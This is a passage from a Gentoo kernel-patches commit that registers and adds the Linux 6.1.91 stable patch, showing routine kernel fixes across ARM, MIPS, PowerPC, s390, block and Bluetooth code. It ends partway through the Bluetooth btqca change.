 1090_linux-6.1.91.patch | 9680 +++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 9684 insertions(+)

diff --git a/0000_README b/0000_README
index 1123ae49..b8e8658e 100644
--- a/0000_README
+++ b/0000_README
@@ -403,6 +403,10 @@ Patch:  1089_linux-6.1.90.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.90
 
+Patch:  1090_linux-6.1.91.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.1.91
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1090_linux-6.1.91.patch b/1090_linux-6.1.91.patch
new file mode 100644
index 00000000..583a7a37
--- /dev/null
+++ b/1090_linux-6.1.91.patch
@@ -0,0 +1,9680 @@
+diff --git a/Documentation/devicetree/bindings/iio/health/maxim,max30102.yaml b/Documentation/devicetree/bindings/iio/health/maxim,max30102.yaml
+index c13c10c8d65da..eed0df9d3a232 100644
+--- a/Documentation/devicetree/bindings/iio/health/maxim,max30102.yaml
++++ b/Documentation/devicetree/bindings/iio/health/maxim,max30102.yaml
+@@ -42,7 +42,7 @@ allOf:
+       properties:
+         compatible:
+           contains:
+-            const: maxim,max30100
++            const: maxim,max30102
+     then:
+       properties:
+         maxim,green-led-current-microamp: false
+diff --git a/MAINTAINERS b/MAINTAINERS
+index ecf4d0c8f446e..4b19dfb5d2fd4 100644
+--- a/MAINTAINERS
++++ b/MAINTAINERS
+@@ -22557,6 +22557,7 @@ F:	include/xen/swiotlb-xen.h
+ 
+ XFS FILESYSTEM
+ C:	irc://irc.oftc.net/xfs
++M:	Leah Rumancik <leah.rumancik@gmail.com>
+ M:	Darrick J. Wong <djwong@kernel.org>
+ L:	linux-xfs@vger.kernel.org
+ S:	Supported
+diff --git a/Makefile b/Makefile
+index 7ae5cf9ec9e55..a7d90996e4125 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 90
++SUBLEVEL = 91
+ EXTRAVERSION =
+ NAME = Curry Ramen
+ 
+diff --git a/arch/arm/kernel/sleep.S b/arch/arm/kernel/sleep.S
+index a86a1d4f34618..93afd1005b43c 100644
+--- a/arch/arm/kernel/sleep.S
++++ b/arch/arm/kernel/sleep.S
+@@ -127,6 +127,10 @@ cpu_resume_after_mmu:
+ 	instr_sync
+ #endif
+ 	bl	cpu_init		@ restore the und/abt/irq banked regs
++#if defined(CONFIG_KASAN) && defined(CONFIG_KASAN_STACK)
++	mov	r0, sp
++	bl	kasan_unpoison_task_stack_below
++#endif
+ 	mov	r0, #0			@ return zero on success
+ 	ldmfd	sp!, {r4 - r11, pc}
+ ENDPROC(cpu_resume_after_mmu)
+diff --git a/arch/arm64/kvm/vgic/vgic-kvm-device.c b/arch/arm64/kvm/vgic/vgic-kvm-device.c
+index bf4b3d9631ce1..63731fb3d8f63 100644
+--- a/arch/arm64/kvm/vgic/vgic-kvm-device.c
++++ b/arch/arm64/kvm/vgic/vgic-kvm-device.c
+@@ -337,16 +337,12 @@ int kvm_register_vgic_device(unsigned long type)
+ int vgic_v2_parse_attr(struct kvm_device *dev, struct kvm_device_attr *attr,
+ 		       struct vgic_reg_attr *reg_attr)
+ {
+-	int cpuid;
++	int cpuid = FIELD_GET(KVM_DEV_ARM_VGIC_CPUID_MASK, attr->attr);
+ 
+-	cpuid = (attr->attr & KVM_DEV_ARM_VGIC_CPUID_MASK) >>
+-		 KVM_DEV_ARM_VGIC_CPUID_SHIFT;
+-
+-	if (cpuid >= atomic_read(&dev->kvm->online_vcpus))
+-		return -EINVAL;
+-
+-	reg_attr->vcpu = kvm_get_vcpu(dev->kvm, cpuid);
+ 	reg_attr->addr = attr->attr & KVM_DEV_ARM_VGIC_OFFSET_MASK;
++	reg_attr->vcpu = kvm_get_vcpu_by_id(dev->kvm, cpuid);
++	if (!reg_attr->vcpu)
++		return -EINVAL;
+ 
+ 	return 0;
+ }
+diff --git a/arch/arm64/net/bpf_jit_comp.c b/arch/arm64/net/bpf_jit_comp.c
+index 0ce5f13eabb1b..afb79209d4132 100644
+--- a/arch/arm64/net/bpf_jit_comp.c
++++ b/arch/arm64/net/bpf_jit_comp.c
+@@ -1679,15 +1679,15 @@ static void invoke_bpf_prog(struct jit_ctx *ctx, struct bpf_tramp_link *l,
+ 
+ 	emit_call(enter_prog, ctx);
+ 
++	/* save return value to callee saved register x20 */
++	emit(A64_MOV(1, A64_R(20), A64_R(0)), ctx);
++
+ 	/* if (__bpf_prog_enter(prog) == 0)
+ 	 *         goto skip_exec_of_prog;
+ 	 */
+ 	branch = ctx->image + ctx->idx;
+ 	emit(A64_NOP, ctx);
+ 
+-	/* save return value to callee saved register x20 */
+-	emit(A64_MOV(1, A64_R(20), A64_R(0)), ctx);
+-
+ 	emit(A64_ADD_I(1, A64_R(0), A64_SP, args_off), ctx);
+ 	if (!p->jited)
+ 		emit_addr_mov_i64(A64_R(1), (const u64)p->insnsi, ctx);
+diff --git a/arch/mips/include/asm/ptrace.h b/arch/mips/include/asm/ptrace.h
+index b3e4dd6be7e20..428b9f1cf1de2 100644
+--- a/arch/mips/include/asm/ptrace.h
++++ b/arch/mips/include/asm/ptrace.h
+@@ -157,7 +157,7 @@ static inline long regs_return_value(struct pt_regs *regs)
+ #define instruction_pointer(regs) ((regs)->cp0_epc)
+ #define profile_pc(regs) instruction_pointer(regs)
+ 
+-extern asmlinkage long syscall_trace_enter(struct pt_regs *regs, long syscall);
++extern asmlinkage long syscall_trace_enter(struct pt_regs *regs);
+ extern asmlinkage void syscall_trace_leave(struct pt_regs *regs);
+ 
+ extern void die(const char *, struct pt_regs *) __noreturn;
+diff --git a/arch/mips/kernel/asm-offsets.c b/arch/mips/kernel/asm-offsets.c
+index c4501897b870b..08342b9eccdbd 100644
+--- a/arch/mips/kernel/asm-offsets.c
++++ b/arch/mips/kernel/asm-offsets.c
+@@ -98,6 +98,7 @@ void output_thread_info_defines(void)
+ 	OFFSET(TI_CPU, thread_info, cpu);
+ 	OFFSET(TI_PRE_COUNT, thread_info, preempt_count);
+ 	OFFSET(TI_REGS, thread_info, regs);
++	OFFSET(TI_SYSCALL, thread_info, syscall);
+ 	DEFINE(_THREAD_SIZE, THREAD_SIZE);
+ 	DEFINE(_THREAD_MASK, THREAD_MASK);
+ 	DEFINE(_IRQ_STACK_SIZE, IRQ_STACK_SIZE);
+diff --git a/arch/mips/kernel/ptrace.c b/arch/mips/kernel/ptrace.c
+index 567aec4abac0f..a8e569830ec8d 100644
+--- a/arch/mips/kernel/ptrace.c
++++ b/arch/mips/kernel/ptrace.c
+@@ -1309,16 +1309,13 @@ long arch_ptrace(struct task_struct *child, long request,
+  * Notification of system call entry/exit
+  * - triggered by current->work.syscall_trace
+  */
+-asmlinkage long syscall_trace_enter(struct pt_regs *regs, long syscall)
++asmlinkage long syscall_trace_enter(struct pt_regs *regs)
+ {
+ 	user_exit();
+ 
+-	current_thread_info()->syscall = syscall;
+-
+ 	if (test_thread_flag(TIF_SYSCALL_TRACE)) {
+ 		if (ptrace_report_syscall_entry(regs))
+ 			return -1;
+-		syscall = current_thread_info()->syscall;
+ 	}
+ 
+ #ifdef CONFIG_SECCOMP
+@@ -1327,7 +1324,7 @@ asmlinkage long syscall_trace_enter(struct pt_regs *regs, long syscall)
+ 		struct seccomp_data sd;
+ 		unsigned long args[6];
+ 
+-		sd.nr = syscall;
++		sd.nr = current_thread_info()->syscall;
+ 		sd.arch = syscall_get_arch(current);
+ 		syscall_get_arguments(current, regs, args);
+ 		for (i = 0; i < 6; i++)
+@@ -1337,23 +1334,23 @@ asmlinkage long syscall_trace_enter(struct pt_regs *regs, long syscall)
+ 		ret = __secure_computing(&sd);
+ 		if (ret == -1)
+ 			return ret;
+-		syscall = current_thread_info()->syscall;
+ 	}
+ #endif
+ 
+ 	if (unlikely(test_thread_flag(TIF_SYSCALL_TRACEPOINT)))
+ 		trace_sys_enter(regs, regs->regs[2]);
+ 
+-	audit_syscall_entry(syscall, regs->regs[4], regs->regs[5],
++	audit_syscall_entry(current_thread_info()->syscall,
++			    regs->regs[4], regs->regs[5],
+ 			    regs->regs[6], regs->regs[7]);
+ 
+ 	/*
+ 	 * Negative syscall numbers are mistaken for rejected syscalls, but
+ 	 * won't have had the return value set appropriately, so we do so now.
+ 	 */
+-	if (syscall < 0)
++	if (current_thread_info()->syscall < 0)
+ 		syscall_set_return_value(current, regs, -ENOSYS, 0);
+-	return syscall;
++	return current_thread_info()->syscall;
+ }
+ 
+ /*
+diff --git a/arch/mips/kernel/scall32-o32.S b/arch/mips/kernel/scall32-o32.S
+index 18dc9b3450561..2c604717e6308 100644
+--- a/arch/mips/kernel/scall32-o32.S
++++ b/arch/mips/kernel/scall32-o32.S
+@@ -77,6 +77,18 @@ loads_done:
+ 	PTR_WD	load_a7, bad_stack_a7
+ 	.previous
+ 
++	/*
++	 * syscall number is in v0 unless we called syscall(__NR_###)
++	 * where the real syscall number is in a0
++	 */
++	subu	t2, v0,  __NR_O32_Linux
++	bnez	t2, 1f /* __NR_syscall at offset 0 */
++	LONG_S	a0, TI_SYSCALL($28)	# Save a0 as syscall number
++	b	2f
++1:
++	LONG_S	v0, TI_SYSCALL($28)	# Save v0 as syscall number
++2:
++
+ 	lw	t0, TI_FLAGS($28)	# syscall tracing enabled?
+ 	li	t1, _TIF_WORK_SYSCALL_ENTRY
+ 	and	t0, t1
+@@ -114,16 +126,7 @@ syscall_trace_entry:
+ 	SAVE_STATIC
+ 	move	a0, sp
+ 
+-	/*
+-	 * syscall number is in v0 unless we called syscall(__NR_###)
+-	 * where the real syscall number is in a0
+-	 */
+-	move	a1, v0
+-	subu	t2, v0,  __NR_O32_Linux
+-	bnez	t2, 1f /* __NR_syscall at offset 0 */
+-	lw	a1, PT_R4(sp)
+-
+-1:	jal	syscall_trace_enter
++	jal	syscall_trace_enter
+ 
+ 	bltz	v0, 1f			# seccomp failed? Skip syscall
+ 
+diff --git a/arch/mips/kernel/scall64-n32.S b/arch/mips/kernel/scall64-n32.S
+index 97456b2ca7dc3..97788859238c3 100644
+--- a/arch/mips/kernel/scall64-n32.S
++++ b/arch/mips/kernel/scall64-n32.S
+@@ -44,6 +44,8 @@ NESTED(handle_sysn32, PT_SIZE, sp)
+ 
+ 	sd	a3, PT_R26(sp)		# save a3 for syscall restarting
+ 
++	LONG_S	v0, TI_SYSCALL($28)     # Store syscall number
++
+ 	li	t1, _TIF_WORK_SYSCALL_ENTRY
+ 	LONG_L	t0, TI_FLAGS($28)	# syscall tracing enabled?
+ 	and	t0, t1, t0
+@@ -72,7 +74,6 @@ syscall_common:
+ n32_syscall_trace_entry:
+ 	SAVE_STATIC
+ 	move	a0, sp
+-	move	a1, v0
+ 	jal	syscall_trace_enter
+ 
+ 	bltz	v0, 1f			# seccomp failed? Skip syscall
+diff --git a/arch/mips/kernel/scall64-n64.S b/arch/mips/kernel/scall64-n64.S
+index e6264aa62e457..be11ea5cc67e0 100644
+--- a/arch/mips/kernel/scall64-n64.S
++++ b/arch/mips/kernel/scall64-n64.S
+@@ -46,6 +46,8 @@ NESTED(handle_sys64, PT_SIZE, sp)
+ 
+ 	sd	a3, PT_R26(sp)		# save a3 for syscall restarting
+ 
++	LONG_S	v0, TI_SYSCALL($28)     # Store syscall number
++
+ 	li	t1, _TIF_WORK_SYSCALL_ENTRY
+ 	LONG_L	t0, TI_FLAGS($28)	# syscall tracing enabled?
+ 	and	t0, t1, t0
+@@ -82,7 +84,6 @@ n64_syscall_exit:
+ syscall_trace_entry:
+ 	SAVE_STATIC
+ 	move	a0, sp
+-	move	a1, v0
+ 	jal	syscall_trace_enter
+ 
+ 	bltz	v0, 1f			# seccomp failed? Skip syscall
+diff --git a/arch/mips/kernel/scall64-o32.S b/arch/mips/kernel/scall64-o32.S
+index d3c2616cba226..7a5abb73e5312 100644
+--- a/arch/mips/kernel/scall64-o32.S
++++ b/arch/mips/kernel/scall64-o32.S
+@@ -79,6 +79,22 @@ loads_done:
+ 	PTR_WD	load_a7, bad_stack_a7
+ 	.previous
+ 
++	/*
++	 * absolute syscall number is in v0 unless we called syscall(__NR_###)
++	 * where the real syscall number is in a0
++	 * note: NR_syscall is the first O32 syscall but the macro is
++	 * only defined when compiling with -mabi=32 (CONFIG_32BIT)
++	 * therefore __NR_O32_Linux is used (4000)
++	 */
++
++	subu	t2, v0,  __NR_O32_Linux
++	bnez	t2, 1f /* __NR_syscall at offset 0 */
++	LONG_S	a0, TI_SYSCALL($28)	# Save a0 as syscall number
++	b	2f
++1:
++	LONG_S	v0, TI_SYSCALL($28)	# Save v0 as syscall number
++2:
++
+ 	li	t1, _TIF_WORK_SYSCALL_ENTRY
+ 	LONG_L	t0, TI_FLAGS($28)	# syscall tracing enabled?
+ 	and	t0, t1, t0
+@@ -113,22 +129,7 @@ trace_a_syscall:
+ 	sd	a7, PT_R11(sp)		# For indirect syscalls
+ 
+ 	move	a0, sp
+-	/*
+-	 * absolute syscall number is in v0 unless we called syscall(__NR_###)
+-	 * where the real syscall number is in a0
+-	 * note: NR_syscall is the first O32 syscall but the macro is
+-	 * only defined when compiling with -mabi=32 (CONFIG_32BIT)
+-	 * therefore __NR_O32_Linux is used (4000)
+-	 */
+-	.set	push
+-	.set	reorder
+-	subu	t1, v0,  __NR_O32_Linux
+-	move	a1, v0
+-	bnez	t1, 1f /* __NR_syscall at offset 0 */
+-	ld	a1, PT_R4(sp) /* Arg1 for __NR_syscall case */
+-	.set	pop
+-
+-1:	jal	syscall_trace_enter
++	jal	syscall_trace_enter
+ 
+ 	bltz	v0, 1f			# seccomp failed? Skip syscall
+ 
+diff --git a/arch/powerpc/platforms/pseries/iommu.c b/arch/powerpc/platforms/pseries/iommu.c
+index 1e5f083cdb720..5e00a3cde93b9 100644
+--- a/arch/powerpc/platforms/pseries/iommu.c
++++ b/arch/powerpc/platforms/pseries/iommu.c
+@@ -781,8 +781,16 @@ static void pci_dma_bus_setup_pSeriesLP(struct pci_bus *bus)
+ 	 * parent bus. During reboot, there will be ibm,dma-window property to
+ 	 * define DMA window. For kdump, there will at least be default window or DDW
+ 	 * or both.
++	 * There is an exception to the above. In case the PE goes into frozen
++	 * state, firmware may not provide ibm,dma-window property at the time
++	 * of LPAR boot up.
+ 	 */
+ 
++	if (!pdn) {
++		pr_debug("  no ibm,dma-window property !\n");
++		return;
++	}
++
+ 	ppci = PCI_DN(pdn);
+ 
+ 	pr_debug("  parent is %pOF, iommu_table: 0x%p\n",
+diff --git a/arch/powerpc/platforms/pseries/plpks.c b/arch/powerpc/platforms/pseries/plpks.c
+index 63a1e1fe01851..25f95440a773b 100644
+--- a/arch/powerpc/platforms/pseries/plpks.c
++++ b/arch/powerpc/platforms/pseries/plpks.c
+@@ -21,19 +21,6 @@
+ 
+ #include "plpks.h"
+ 
+-#define PKS_FW_OWNER	     0x1
+-#define PKS_BOOTLOADER_OWNER 0x2
+-#define PKS_OS_OWNER	     0x3
+-
+-#define LABEL_VERSION	    0
+-#define MAX_LABEL_ATTR_SIZE 16
+-#define MAX_NAME_SIZE	    239
+-#define MAX_DATA_SIZE	    4000
+-
+-#define PKS_FLUSH_MAX_TIMEOUT 5000 //msec
+-#define PKS_FLUSH_SLEEP	      10 //msec
+-#define PKS_FLUSH_SLEEP_RANGE 400
+-
+ static u8 *ospassword;
+ static u16 ospasswordlength;
+ 
+@@ -60,7 +47,7 @@ struct label_attr {
+ 
+ struct label {
+ 	struct label_attr attr;
+-	u8 name[MAX_NAME_SIZE];
++	u8 name[PLPKS_MAX_NAME_SIZE];
+ 	size_t size;
+ };
+ 
+@@ -123,7 +110,7 @@ static int pseries_status_to_err(int rc)
+ static int plpks_gen_password(void)
+ {
+ 	unsigned long retbuf[PLPAR_HCALL_BUFSIZE] = { 0 };
+-	u8 *password, consumer = PKS_OS_OWNER;
++	u8 *password, consumer = PLPKS_OS_OWNER;
+ 	int rc;
+ 
+ 	password = kzalloc(maxpwsize, GFP_KERNEL);
+@@ -159,22 +146,18 @@ static struct plpks_auth *construct_auth(u8 consumer)
+ {
+ 	struct plpks_auth *auth;
+ 
+-	if (consumer > PKS_OS_OWNER)
++	if (consumer > PLPKS_OS_OWNER)
+ 		return ERR_PTR(-EINVAL);
+ 
+-	auth = kmalloc(struct_size(auth, password, maxpwsize), GFP_KERNEL);
++	auth = kzalloc(struct_size(auth, password, maxpwsize), GFP_KERNEL);
+ 	if (!auth)
+ 		return ERR_PTR(-ENOMEM);
+ 
+ 	auth->version = 1;
+ 	auth->consumer = consumer;
+-	auth->rsvd0 = 0;
+-	auth->rsvd1 = 0;
+ 
+-	if (consumer == PKS_FW_OWNER || consumer == PKS_BOOTLOADER_OWNER) {
+-		auth->passwordlength = 0;
++	if (consumer == PLPKS_FW_OWNER || consumer == PLPKS_BOOTLOADER_OWNER)
+ 		return auth;
+-	}
+ 
+ 	memcpy(auth->password, ospassword, ospasswordlength);
+ 
+@@ -193,7 +176,7 @@ static struct label *construct_label(char *component, u8 varos, u8 *name,
+ 	struct label *label;
+ 	size_t slen;
+ 
+-	if (!name || namelen > MAX_NAME_SIZE)
++	if (!name || namelen > PLPKS_MAX_NAME_SIZE)
+ 		return ERR_PTR(-EINVAL);
+ 
+ 	slen = strlen(component);
+@@ -207,9 +190,9 @@ static struct label *construct_label(char *component, u8 varos, u8 *name,
+ 	if (component)
+ 		memcpy(&label->attr.prefix, component, slen);
+ 
+-	label->attr.version = LABEL_VERSION;
++	label->attr.version = PLPKS_LABEL_VERSION;
+ 	label->attr.os = varos;
+-	label->attr.length = MAX_LABEL_ATTR_SIZE;
++	label->attr.length = PLPKS_MAX_LABEL_ATTR_SIZE;
+ 	memcpy(&label->name, name, namelen);
+ 
+ 	label->size = sizeof(struct label_attr) + namelen;
+@@ -271,10 +254,9 @@ static int plpks_confirm_object_flushed(struct label *label,
+ 		if (!rc && status == 1)
+ 			break;
+ 
+-		usleep_range(PKS_FLUSH_SLEEP,
+-			     PKS_FLUSH_SLEEP + PKS_FLUSH_SLEEP_RANGE);
+-		timeout = timeout + PKS_FLUSH_SLEEP;
+-	} while (timeout < PKS_FLUSH_MAX_TIMEOUT);
++		fsleep(PLPKS_FLUSH_SLEEP);
++		timeout = timeout + PLPKS_FLUSH_SLEEP;
++	} while (timeout < PLPKS_MAX_TIMEOUT);
+ 
+ 	rc = pseries_status_to_err(rc);
+ 
+@@ -289,13 +271,13 @@ int plpks_write_var(struct plpks_var var)
+ 	int rc;
+ 
+ 	if (!var.component || !var.data || var.datalen <= 0 ||
+-	    var.namelen > MAX_NAME_SIZE || var.datalen > MAX_DATA_SIZE)
++	    var.namelen > PLPKS_MAX_NAME_SIZE || var.datalen > PLPKS_MAX_DATA_SIZE)
+ 		return -EINVAL;
+ 
+-	if (var.policy & SIGNEDUPDATE)
++	if (var.policy & PLPKS_SIGNEDUPDATE)
+ 		return -EINVAL;
+ 
+-	auth = construct_auth(PKS_OS_OWNER);
++	auth = construct_auth(PLPKS_OS_OWNER);
+ 	if (IS_ERR(auth))
+ 		return PTR_ERR(auth);
+ 
+@@ -331,10 +313,10 @@ int plpks_remove_var(char *component, u8 varos, struct plpks_var_name vname)
+ 	struct label *label;
+ 	int rc;
+ 
+-	if (!component || vname.namelen > MAX_NAME_SIZE)
++	if (!component || vname.namelen > PLPKS_MAX_NAME_SIZE)
+ 		return -EINVAL;
+ 
+-	auth = construct_auth(PKS_OS_OWNER);
++	auth = construct_auth(PLPKS_OS_OWNER);
+ 	if (IS_ERR(auth))
+ 		return PTR_ERR(auth);
+ 
+@@ -370,14 +352,14 @@ static int plpks_read_var(u8 consumer, struct plpks_var *var)
+ 	u8 *output;
+ 	int rc;
+ 
+-	if (var->namelen > MAX_NAME_SIZE)
++	if (var->namelen > PLPKS_MAX_NAME_SIZE)
+ 		return -EINVAL;
+ 
+ 	auth = construct_auth(consumer);
+ 	if (IS_ERR(auth))
+ 		return PTR_ERR(auth);
+ 
+-	if (consumer == PKS_OS_OWNER) {
++	if (consumer == PLPKS_OS_OWNER) {
+ 		label = construct_label(var->component, var->os, var->name,
+ 					var->namelen);
+ 		if (IS_ERR(label)) {
+@@ -392,7 +374,7 @@ static int plpks_read_var(u8 consumer, struct plpks_var *var)
+ 		goto out_free_label;
+ 	}
+ 
+-	if (consumer == PKS_OS_OWNER)
++	if (consumer == PLPKS_OS_OWNER)
+ 		rc = plpar_hcall(H_PKS_READ_OBJECT, retbuf, virt_to_phys(auth),
+ 				 virt_to_phys(label), label->size, virt_to_phys(output),
+ 				 maxobjsize);
+@@ -434,17 +416,17 @@ static int plpks_read_var(u8 consumer, struct plpks_var *var)
+ 
+ int plpks_read_os_var(struct plpks_var *var)
+ {
+-	return plpks_read_var(PKS_OS_OWNER, var);
++	return plpks_read_var(PLPKS_OS_OWNER, var);
+ }
+ 
+ int plpks_read_fw_var(struct plpks_var *var)
+ {
+-	return plpks_read_var(PKS_FW_OWNER, var);
++	return plpks_read_var(PLPKS_FW_OWNER, var);
+ }
+ 
+ int plpks_read_bootloader_var(struct plpks_var *var)
+ {
+-	return plpks_read_var(PKS_BOOTLOADER_OWNER, var);
++	return plpks_read_var(PLPKS_BOOTLOADER_OWNER, var);
+ }
+ 
+ static __init int pseries_plpks_init(void)
+diff --git a/arch/powerpc/platforms/pseries/plpks.h b/arch/powerpc/platforms/pseries/plpks.h
+index 275ccd86bfb5e..07278a990c2df 100644
+--- a/arch/powerpc/platforms/pseries/plpks.h
++++ b/arch/powerpc/platforms/pseries/plpks.h
+@@ -12,14 +12,39 @@
+ #include <linux/types.h>
+ #include <linux/list.h>
+ 
+-#define OSSECBOOTAUDIT 0x40000000
+-#define OSSECBOOTENFORCE 0x20000000
+-#define WORLDREADABLE 0x08000000
+-#define SIGNEDUPDATE 0x01000000
++// Object policy flags from supported_policies
++#define PLPKS_OSSECBOOTAUDIT	PPC_BIT32(1) // OS secure boot must be audit/enforce
++#define PLPKS_OSSECBOOTENFORCE	PPC_BIT32(2) // OS secure boot must be enforce
++#define PLPKS_PWSET		PPC_BIT32(3) // No access without password set
++#define PLPKS_WORLDREADABLE	PPC_BIT32(4) // Readable without authentication
++#define PLPKS_IMMUTABLE		PPC_BIT32(5) // Once written, object cannot be removed
++#define PLPKS_TRANSIENT		PPC_BIT32(6) // Object does not persist through reboot
++#define PLPKS_SIGNEDUPDATE	PPC_BIT32(7) // Object can only be modified by signed updates
++#define PLPKS_HVPROVISIONED	PPC_BIT32(28) // Hypervisor has provisioned this object
+ 
+-#define PLPKS_VAR_LINUX	0x02
++// Signature algorithm flags from signed_update_algorithms
++#define PLPKS_ALG_RSA2048	PPC_BIT(0)
++#define PLPKS_ALG_RSA4096	PPC_BIT(1)
++
++// Object label OS metadata flags
++#define PLPKS_VAR_LINUX		0x02
+ #define PLPKS_VAR_COMMON	0x04
+ 
++// Flags for which consumer owns an object is owned by
++#define PLPKS_FW_OWNER			0x1
++#define PLPKS_BOOTLOADER_OWNER		0x2
++#define PLPKS_OS_OWNER			0x3
++
++// Flags for label metadata fields
++#define PLPKS_LABEL_VERSION		0
++#define PLPKS_MAX_LABEL_ATTR_SIZE	16
++#define PLPKS_MAX_NAME_SIZE		239
++#define PLPKS_MAX_DATA_SIZE		4000
++
++// Timeouts for PLPKS operations
++#define PLPKS_MAX_TIMEOUT		(5 * USEC_PER_SEC)
++#define PLPKS_FLUSH_SLEEP		10000 // usec
++
+ struct plpks_var {
+ 	char *component;
+ 	u8 *name;
+diff --git a/arch/s390/include/asm/dwarf.h b/arch/s390/include/asm/dwarf.h
+index 4f21ae561e4dd..390906b8e386e 100644
+--- a/arch/s390/include/asm/dwarf.h
++++ b/arch/s390/include/asm/dwarf.h
+@@ -9,6 +9,7 @@
+ #define CFI_DEF_CFA_OFFSET	.cfi_def_cfa_offset
+ #define CFI_ADJUST_CFA_OFFSET	.cfi_adjust_cfa_offset
+ #define CFI_RESTORE		.cfi_restore
++#define CFI_REL_OFFSET		.cfi_rel_offset
+ 
+ #ifdef CONFIG_AS_CFI_VAL_OFFSET
+ #define CFI_VAL_OFFSET		.cfi_val_offset
+diff --git a/arch/s390/kernel/vdso64/vdso_user_wrapper.S b/arch/s390/kernel/vdso64/vdso_user_wrapper.S
+index 97f0c0a669a59..0625381359df4 100644
+--- a/arch/s390/kernel/vdso64/vdso_user_wrapper.S
++++ b/arch/s390/kernel/vdso64/vdso_user_wrapper.S
+@@ -23,8 +23,10 @@ __kernel_\func:
+ 	CFI_DEF_CFA_OFFSET (STACK_FRAME_OVERHEAD + WRAPPER_FRAME_SIZE)
+ 	CFI_VAL_OFFSET 15, -STACK_FRAME_OVERHEAD
+ 	stg	%r14,STACK_FRAME_OVERHEAD(%r15)
++	CFI_REL_OFFSET 14, STACK_FRAME_OVERHEAD
+ 	brasl	%r14,__s390_vdso_\func
+ 	lg	%r14,STACK_FRAME_OVERHEAD(%r15)
++	CFI_RESTORE 14
+ 	aghi	%r15,WRAPPER_FRAME_SIZE
+ 	CFI_DEF_CFA_OFFSET STACK_FRAME_OVERHEAD
+ 	CFI_RESTORE 15
+diff --git a/arch/s390/mm/gmap.c b/arch/s390/mm/gmap.c
+index 662cf23a1b44b..59657e0363e7c 100644
+--- a/arch/s390/mm/gmap.c
++++ b/arch/s390/mm/gmap.c
+@@ -2642,7 +2642,7 @@ static int __s390_enable_skey_hugetlb(pte_t *pte, unsigned long addr,
+ 		return 0;
+ 
+ 	start = pmd_val(*pmd) & HPAGE_MASK;
+-	end = start + HPAGE_SIZE - 1;
++	end = start + HPAGE_SIZE;
+ 	__storage_key_init_range(start, end);
+ 	set_bit(PG_arch_1, &page->flags);
+ 	cond_resched();
+diff --git a/arch/s390/mm/hugetlbpage.c b/arch/s390/mm/hugetlbpage.c
+index c299a18273ffe..33ef6790114ab 100644
+--- a/arch/s390/mm/hugetlbpage.c
++++ b/arch/s390/mm/hugetlbpage.c
+@@ -139,7 +139,7 @@ static void clear_huge_pte_skeys(struct mm_struct *mm, unsigned long rste)
+ 	}
+ 
+ 	if (!test_and_set_bit(PG_arch_1, &page->flags))
+-		__storage_key_init_range(paddr, paddr + size - 1);
++		__storage_key_init_range(paddr, paddr + size);
+ }
+ 
+ void set_huge_pte_at(struct mm_struct *mm, unsigned long addr,
+diff --git a/block/blk-iocost.c b/block/blk-iocost.c
+index e6557024e3da8..64b594d660b79 100644
+--- a/block/blk-iocost.c
++++ b/block/blk-iocost.c
+@@ -1331,7 +1331,7 @@ static bool iocg_kick_delay(struct ioc_gq *iocg, struct ioc_now *now)
+ {
+ 	struct ioc *ioc = iocg->ioc;
+ 	struct blkcg_gq *blkg = iocg_to_blkg(iocg);
+-	u64 tdelta, delay, new_delay;
++	u64 tdelta, delay, new_delay, shift;
+ 	s64 vover, vover_pct;
+ 	u32 hwa;
+ 
+@@ -1346,8 +1346,9 @@ static bool iocg_kick_delay(struct ioc_gq *iocg, struct ioc_now *now)
+ 
+ 	/* calculate the current delay in effect - 1/2 every second */
+ 	tdelta = now->now - iocg->delay_at;
+-	if (iocg->delay)
+-		delay = iocg->delay >> div64_u64(tdelta, USEC_PER_SEC);
++	shift = div64_u64(tdelta, USEC_PER_SEC);
++	if (iocg->delay && shift < BITS_PER_LONG)
++		delay = iocg->delay >> shift;
+ 	else
+ 		delay = 0;
+ 
+diff --git a/block/ioctl.c b/block/ioctl.c
+index 47567ba1185a6..99b8e2e448729 100644
+--- a/block/ioctl.c
++++ b/block/ioctl.c
+@@ -89,7 +89,7 @@ static int blk_ioctl_discard(struct block_device *bdev, fmode_t mode,
+ 		unsigned long arg)
+ {
+ 	uint64_t range[2];
+-	uint64_t start, len;
++	uint64_t start, len, end;
+ 	struct inode *inode = bdev->bd_inode;
+ 	int err;
+ 
+@@ -110,7 +110,8 @@ static int blk_ioctl_discard(struct block_device *bdev, fmode_t mode,
+ 	if (len & 511)
+ 		return -EINVAL;
+ 
+-	if (start + len > bdev_nr_bytes(bdev))
++	if (check_add_overflow(start, len, &end) ||
++	    end > bdev_nr_bytes(bdev))
+ 		return -EINVAL;
+ 
+ 	filemap_invalidate_lock(inode->i_mapping);
+diff --git a/drivers/ata/sata_gemini.c b/drivers/ata/sata_gemini.c
+index c96fcf9ee3c07..01f050b1bc93b 100644
+--- a/drivers/ata/sata_gemini.c
++++ b/drivers/ata/sata_gemini.c
+@@ -201,7 +201,10 @@ int gemini_sata_start_bridge(struct sata_gemini *sg, unsigned int bridge)
+ 		pclk = sg->sata0_pclk;
+ 	else
+ 		pclk = sg->sata1_pclk;
+-	clk_enable(pclk);
++	ret = clk_enable(pclk);
++	if (ret)
++		return ret;
++
+ 	msleep(10);
+ 
+ 	/* Do not keep clocking a bridge that is not online */
+diff --git a/drivers/bluetooth/btqca.c b/drivers/bluetooth/btqca.c
+index 5277090c6d6d7..a0fadde993d70 100644
+--- a/drivers/bluetooth/btqca.c
++++ b/drivers/bluetooth/btqca.c
+@@ -99,7 +99,8 @@ static int qca_read_fw_build_info(struct hci_dev *hdev)
+ {
+ 	struct sk_buff *skb;
+ 	struct edl_event_hdr *edl;
+-	char cmd, build_label[QCA_FW_BUILD_VER_LEN];
++	char *build_label;
++	char cmd;
+ 	int build_lbl_len, err = 0;
+ 
+ 	bt_dev_dbg(hdev, "QCA read fw build info");
+@@ -114,6 +115,11 @@ static int qca_read_fw_build_info(struct hci_dev *hdev)
+ 		return err;
+ 	}
+ 
++	if (skb->len < sizeof(*edl)) {
++		err = -EILSEQ;
++		goto out;
++	}
++
+ 	edl = (struct edl_event_hdr *)(skb->data);
